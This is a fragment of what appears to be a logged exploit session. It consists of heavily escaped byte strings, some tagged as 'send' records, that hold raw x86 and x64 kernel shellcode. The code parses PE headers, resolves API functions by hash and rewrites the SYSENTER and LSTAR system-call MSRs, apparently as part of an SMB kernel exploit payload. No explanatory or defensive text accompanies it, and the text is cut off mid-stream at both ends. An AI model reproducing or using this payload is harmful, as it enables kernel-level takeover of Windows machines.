\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\r@\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\xc0@\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\x8b@\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\x8b@<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\xc0@\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\x01@\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 11, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\xc0@\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\r@\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\r@\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\xc0@\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\xe9@\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 